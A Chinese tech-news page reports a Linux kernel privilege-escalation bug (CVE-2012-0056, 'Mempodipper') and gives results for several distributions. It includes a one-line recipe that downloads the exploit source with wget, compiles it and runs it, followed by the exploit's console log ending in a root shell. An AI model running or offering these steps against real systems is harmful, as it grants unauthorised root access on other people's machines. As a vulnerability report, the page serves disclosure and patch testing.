首页 / 操作系统 / Linux / Linux 2.6.39 到 3.2.0 爆提权漏洞

Linux 2.6.39 到 3.2.0 内核爆提权漏洞，普通用户可以通过运行特定代码获得 root 权限。重现方法：wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.ccc mempodipper.c./a.out 在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况：

• Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report
• Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64
• Arch Linux: 失败。内核 3.2.2-1-ARCH

如果你测试了，请将测试结果告诉我们！注意告诉我们发行版和 uname -a 的结果。我机子上测试成功了===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme"ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
rootUbuntu11.10Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/LinuxOracle Database Server Core RDBMS远程拒绝服务漏洞Oracle Sun Solaris Kernel本地拒绝服务漏洞（CVE-2012-0103）相关资讯      Linux漏洞 

敲击28次退格键之后：Linux漏洞可  （12/18/2015 11:22:28） Linux出现重大漏洞 GHOST ？  （01/30/2015 18:35:07） Linux 2.6.31本地代码执行漏洞（  （07/07/2014 07:51:17）

Red Hat Linux 修补“libuser”库  （07/26/2015 06:39:34） 红帽反驳：“Grinch（鬼精灵）”算  （12/30/2014 07:38:23） Linux gcc++漏洞：普通用户获得  （08/16/2013 11:57:41）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款

收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图